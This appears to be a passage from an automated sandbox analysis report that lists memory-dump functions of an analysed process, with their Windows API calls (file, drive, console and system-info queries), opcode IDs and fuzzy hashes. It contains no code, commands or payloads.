                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 627d58386b5d3a8ef0314f03fd394a287d4b2a17d80bad094962b6fc36ccd61a
                                                                                            • Instruction ID: 16041d9159311f428c3f22362e27168736fc889baa2cfdbeb52edcc55c02c05e
                                                                                            • Opcode Fuzzy Hash: 627d58386b5d3a8ef0314f03fd394a287d4b2a17d80bad094962b6fc36ccd61a
                                                                                            • Instruction Fuzzy Hash: CD119D72508380AFDB22CF65DC45B52FFF4EF05210F08849EEA898B662D375E918CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: ad22ae0eb1e1542cbf419b75b53bc8abe05abd498f8083c059b0d2b7dc51a104
                                                                                            • Instruction ID: b69e1be3651d8d2658a2ec91db0d3c2418f1b2288c031bfb3a7714f598b5c6a9
                                                                                            • Opcode Fuzzy Hash: ad22ae0eb1e1542cbf419b75b53bc8abe05abd498f8083c059b0d2b7dc51a104
                                                                                            • Instruction Fuzzy Hash: AA1191715093849FDB118F25DC45B96FFA4EF06220F0984EEED898B252D375A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 977de160b1193a9db2638108e638305d0a1079c037e35be0f22327de141b929b
                                                                                            • Instruction ID: 9934ef8de175cb2c787d9d42f1d997f4f47f49aeccf123d05dad056e9d3d7767
                                                                                            • Opcode Fuzzy Hash: 977de160b1193a9db2638108e638305d0a1079c037e35be0f22327de141b929b
                                                                                            • Instruction Fuzzy Hash: A5118F714093C0AFEB128B15DC54A62FFB4DF47654F0880CAEDC44F253D265A908DB72
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 26e1a2cd6549177c1dd96c73659d9b713c3762fd833b5f96eba28b289e7858cb
                                                                                            • Instruction ID: ec361d15e44eacc65a07e16e14d2818929a53376f425a7f9acf1b9dbe6db20ce
                                                                                            • Opcode Fuzzy Hash: 26e1a2cd6549177c1dd96c73659d9b713c3762fd833b5f96eba28b289e7858cb
                                                                                            • Instruction Fuzzy Hash: 9D11E5755093C09FDB128B15DC95B52FFB4DF43224F0880DBED858B663D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 13d80290a7247ede0f509ee2d2adac655b62f7fbdd0aa6afcd4bbd9ab7947bbb
                                                                                            • Instruction ID: 12eeedb057f78a419c2c6877d6c86fd055cd6f831d146cb21513756cf7346467
                                                                                            • Opcode Fuzzy Hash: 13d80290a7247ede0f509ee2d2adac655b62f7fbdd0aa6afcd4bbd9ab7947bbb
                                                                                            • Instruction Fuzzy Hash: EE11BF714093C09FEB22CB25DC55B92FFB4EF07324F0980DADD844B263D265A908CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 90a784bcb98a2aa915ed3c02615c64f2c6a6399e89589845722ac363f3dcdb93
                                                                                            • Instruction ID: bd657c88931f8e5fbb9340f799c6b2ae72c760aea0ba4017da4e635dc479d249
                                                                                            • Opcode Fuzzy Hash: 90a784bcb98a2aa915ed3c02615c64f2c6a6399e89589845722ac363f3dcdb93
                                                                                            • Instruction Fuzzy Hash: DA113CB6604304DFEB60DF2ADC85B56FB98EB04621F0884AAEE49CB642D674E504CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 22a01a9f8b58b7916f82e3f144616c4391d6b12b0a0d8efc20e42b4421b10439
                                                                                            • Instruction ID: ecc61c9fc0e5b5bf902d20fc17c9c00334c517605227939de2397add2f4dbc96
                                                                                            • Opcode Fuzzy Hash: 22a01a9f8b58b7916f82e3f144616c4391d6b12b0a0d8efc20e42b4421b10439
                                                                                            • Instruction Fuzzy Hash: 2E11E37540D7C09FD7128B15DC85B91BFB0EF07220F0980DBDD848F163D268A909CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: f2ead5e403632f99c2ed9f59b3759c689f51f375e0e11459aafe0512b27b3c31
                                                                                            • Instruction ID: 1beb11fe56e93e1ccca2cf50418e59f7f36463a81b03d550cebf721ad3c35374
                                                                                            • Opcode Fuzzy Hash: f2ead5e403632f99c2ed9f59b3759c689f51f375e0e11459aafe0512b27b3c31
                                                                                            • Instruction Fuzzy Hash: 80018C71500704EFFB209F15DC86BA6FB98DF44720F1885AAFD099A281D674A904CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 0ef39232c476be4f8fc85d58aeca2de29519ad832c02a4d891d1679be7fa63c1
                                                                                            • Instruction ID: 4a1f44c9faaebe8ce530028fc4c432752fd68786c148598639cd84c9403598e2
                                                                                            • Opcode Fuzzy Hash: 0ef39232c476be4f8fc85d58aeca2de29519ad832c02a4d891d1679be7fa63c1
                                                                                            • Instruction Fuzzy Hash: E511AD76500700DFEF20CF56DC85B66FBA4EF04620F08C4AAED498B652D371E418CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: f556a2f6058b353c29a762cef784eced94155faddecaedfea03ba827ba8f9140
                                                                                            • Instruction ID: 3e774cf4860117aed1a67d2ac084a5ff7b36fa01b38f46ce5d81cbf59ecc4ec5
                                                                                            • Opcode Fuzzy Hash: f556a2f6058b353c29a762cef784eced94155faddecaedfea03ba827ba8f9140
                                                                                            • Instruction Fuzzy Hash: 9311C2B58093809FDB11CF55DC85B82FFA4EF02220F0980EBDD488F153D275A508CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: e868c3daf647731908513665fb5a945f19d7eddf64aa9a5613c6ca171e94a94a
                                                                                            • Instruction ID: b348fd70399479011b62774ebbbf5b01b1c61a3caec7a76ba10043f6d7203031
                                                                                            • Opcode Fuzzy Hash: e868c3daf647731908513665fb5a945f19d7eddf64aa9a5613c6ca171e94a94a
                                                                                            • Instruction Fuzzy Hash: 64118E72500700DFEB61CF55DC45B52FFE4EF04211F0885AEEE898A612D371E518DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 2950e15cda1b934cc31da63dde0d9ba6f3ac51650006d08378dea11e2c027ffd
                                                                                            • Instruction ID: 5352c5a689cc2a6de102296f8b3fb28d8279f140d9ddd304a8131928895ff404
                                                                                            • Opcode Fuzzy Hash: 2950e15cda1b934cc31da63dde0d9ba6f3ac51650006d08378dea11e2c027ffd
                                                                                            • Instruction Fuzzy Hash: 8D018471900600AFE310DF16DC46B66FBA8FB84B60F14816AED089B741D335F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 3d1444f2f42214a48135ab80ebee1fe4c586d787f785ea041bffd620c5b1f7a3
                                                                                            • Instruction ID: 0cd35b712baecdb0b7fb42c88e51fa76c42db1e3bddf2642d62dfb70afe2e0df
                                                                                            • Opcode Fuzzy Hash: 3d1444f2f42214a48135ab80ebee1fe4c586d787f785ea041bffd620c5b1f7a3
                                                                                            • Instruction Fuzzy Hash: 90015E72A04744DFEB10DF65DC8576AFB98EB01661F1884AADC09CB642D774E404CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CFA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: e0edebb5e2c630b30d21d93e027a37063a5868b235e33424788d985be3bb1ea7
                                                                                            • Instruction ID: dc1528d2936ad3595be6f3ed7d287c65e62ef860afd43406f537bb708dbcd60c
                                                                                            • Opcode Fuzzy Hash: e0edebb5e2c630b30d21d93e027a37063a5868b235e33424788d985be3bb1ea7
                                                                                            • Instruction Fuzzy Hash: 43018471900600AFE710DF16DC46B66FBA8FB84A60F14816AED089B741D335F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 262bfb55964368d45fc218a75503cc0acd539977667e1d7504a254bd611d1512
                                                                                            • Instruction ID: e70298a1e73b3559ccfcba160385f89865672b793f66f8a3dd7bee5d25f2042e
                                                                                            • Opcode Fuzzy Hash: 262bfb55964368d45fc218a75503cc0acd539977667e1d7504a254bd611d1512
                                                                                            • Instruction Fuzzy Hash: F101DF71504300DFEF20CF15DC857A9FBA4EF04620F48C4AADC098B642D375A504CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CFBB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 918d33ef6d7513431ce3536764d458c75a2cfde847ef1e7d49067011169024b2
                                                                                            • Instruction ID: 941895b99edc1ecde786c0e14b447faf0371f0d9763b849df673420245e6a3d7
                                                                                            • Opcode Fuzzy Hash: 918d33ef6d7513431ce3536764d458c75a2cfde847ef1e7d49067011169024b2
                                                                                            • Instruction Fuzzy Hash: 0101DF75500204DFEB61CF19DC857A5FBA4EF04620F08C4AEDE498B656D375E904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: e5a71af5526430e37e0f47526a3b5a1def04aea4041d96c002a03bfe38a5916b
                                                                                            • Instruction ID: 0b42efec69d7a7ff501eff9ab7ec688312992853a27e60755293f36a90cd9eb3
                                                                                            • Opcode Fuzzy Hash: e5a71af5526430e37e0f47526a3b5a1def04aea4041d96c002a03bfe38a5916b
                                                                                            • Instruction Fuzzy Hash: 66017871904340DFEB20DF15DC85B66FBA4EB02660F1884AADC48CF246D374E408CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: afecdfc9c99125a839bdcbb2c2e38b834a3c8732088afa12d03e84893ed5f0ce
                                                                                            • Instruction ID: 8350355b69947543d05092b9de1337019357823489cca7d423df7df99296f485
                                                                                            • Opcode Fuzzy Hash: afecdfc9c99125a839bdcbb2c2e38b834a3c8732088afa12d03e84893ed5f0ce
                                                                                            • Instruction Fuzzy Hash: 25016271900600AFD314DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 9a3614b2e3a0075002074344aa4b41b7a18e78631ac513d4b5992763002217cf
                                                                                            • Instruction ID: 844fa7eeffd00042c4e94fed5c819afea4858ae963cdd82e71fdf4a21ada881a
                                                                                            • Opcode Fuzzy Hash: 9a3614b2e3a0075002074344aa4b41b7a18e78631ac513d4b5992763002217cf
                                                                                            • Instruction Fuzzy Hash: D5016271900600AFD314DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 619c977a993f461002d3d5ea768cff1f758fae905e17e4ef919a9da1dbd282ab
                                                                                            • Instruction ID: ff5f8d521ac436ec8067e66b720c48ffd15aa26069a80b224262e1cb7de7acf8
                                                                                            • Opcode Fuzzy Hash: 619c977a993f461002d3d5ea768cff1f758fae905e17e4ef919a9da1dbd282ab
                                                                                            • Instruction Fuzzy Hash: DF01FF35600700DFEF208F15DC89765FBA0EF41620F08C0AAEC498B752D374E908CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 452597a5b9ec756e3e139d6d004eae891bce078be52f2e54b6dce21e33c61e2f
                                                                                            • Instruction ID: c461e7d6bda0fa5e830369c525421e602a8358a204feab98d5f68d70065d5b10
                                                                                            • Opcode Fuzzy Hash: 452597a5b9ec756e3e139d6d004eae891bce078be52f2e54b6dce21e33c61e2f
                                                                                            • Instruction Fuzzy Hash: A101DC31808344DFEB50DF5ADC89BA1FBA4EF00220F08C4AADE0C8F606D275E504CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 08bae6fadc8c7453d8b208f88e4640207ed265cf86be33f8c28bbbcc40686c3e
                                                                                            • Instruction ID: 89894e8c3ca960d275f3030ac0179cf811b27fda1cdbc7152d25dc9a074e3b4d
                                                                                            • Opcode Fuzzy Hash: 08bae6fadc8c7453d8b208f88e4640207ed265cf86be33f8c28bbbcc40686c3e
                                                                                            • Instruction Fuzzy Hash: 99F08735504640DFEB208F05EC89766FBA4EB05A21F88C1EADD495F312D679A948CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: ef4213f24d781b04b5438f48550d565e1ba9f4df54fbfabc226e2e9149fe727f
                                                                                            • Instruction ID: bcc4a68a1cb95c7cec3cf08c08bb84525a971e599ac91ddfad57ea8dc88e2770
                                                                                            • Opcode Fuzzy Hash: ef4213f24d781b04b5438f48550d565e1ba9f4df54fbfabc226e2e9149fe727f
                                                                                            • Instruction Fuzzy Hash: FDF0A935904740DFEF209F06DC89766FBA0EF15621F08C09ADD894B316D375A508CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 68efe47b2a76cd425373cfefdda5ef24910e0bd23bcc5773361a8d7f9fdda340
                                                                                            • Instruction ID: d3e8b1dc795a7306d7423cc6d625a4b3690d2e58f009c3c18ad09293eca0634b
                                                                                            • Opcode Fuzzy Hash: 68efe47b2a76cd425373cfefdda5ef24910e0bd23bcc5773361a8d7f9fdda340
                                                                                            • Instruction Fuzzy Hash: CAF0A935504740DFEB619F0ADC89765FBA0EF04A21F08C09ADE494B312D3B5E908CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 3e1cb19c573b920adee348d21fc64fc9fe3884d91858ff65b8934b5f24481617
                                                                                            • Instruction ID: 1fd0d25ba2c025bf654302cdf0efee9a4ddf6fd84c04c2dea036916339ec93e6
                                                                                            • Opcode Fuzzy Hash: 3e1cb19c573b920adee348d21fc64fc9fe3884d91858ff65b8934b5f24481617
                                                                                            • Instruction Fuzzy Hash: A5F0A931904744DFEB60CF0ADD8A761FBA0EB04621F08C09ADE094B252D2B8E508CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 2e61cc86b59d51cfb403ed0b9ee8e1dd3254abd5ca2ffccc3dc12468271d99c2
                                                                                            • Instruction ID: 79d700a8ee712129f4aba02eb3ecf261495fbce9bfbae21ff7de11476ef33ef7
                                                                                            • Opcode Fuzzy Hash: 2e61cc86b59d51cfb403ed0b9ee8e1dd3254abd5ca2ffccc3dc12468271d99c2
                                                                                            • Instruction Fuzzy Hash: B011A3715093809FD712CF25DC45B96FFA4DF02220F0980EFED898B253D275A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 521cbfd303329b99525a41252c3258dbc994ef769c6465c94a508dc67b9242db
                                                                                            • Instruction ID: b9de277428d63617adc7d8e62aec7551d3f75eb679d5475bb42a38c43d04623b
                                                                                            • Opcode Fuzzy Hash: 521cbfd303329b99525a41252c3258dbc994ef769c6465c94a508dc67b9242db
                                                                                            • Instruction Fuzzy Hash: 24018F75504680DFEB51DF1ADC857A6FB94DF04220F18C4AEDD098B642D675E908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0278014C, Relevance: .9, Instructions: 897COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133344217.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d4612837721318da072d0890c0a9d5ae990d3ec4ccd37e9b54b34cd88403797
                                                                                            • Instruction ID: 47393f55d27bd73428afb7b51182cd6ee9b39a8d16e122c17c64c037a107fb25
                                                                                            • Opcode Fuzzy Hash: 6d4612837721318da072d0890c0a9d5ae990d3ec4ccd37e9b54b34cd88403797
                                                                                            • Instruction Fuzzy Hash: 4161616294E3C06FDB135B308C68AA5BFB09E03228B1E45CBD4C0CF1A3D119694EDB23
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027807F7, Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133344217.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81f3447cdfb5502a7b97795ae9461115dad70234b64eac2ec7efc1127e60f96c
                                                                                            • Instruction ID: a9c069854f972522a1b214003bb57032b1371b1e0dc3cb5ac288844c1105e762
                                                                                            • Opcode Fuzzy Hash: 81f3447cdfb5502a7b97795ae9461115dad70234b64eac2ec7efc1127e60f96c
                                                                                            • Instruction Fuzzy Hash: 0201D6B250D380AFDB128F05EC40962FFA8DF87660B58C0DFEC498B612D225A909CB71
                                                                                            Uniqueness

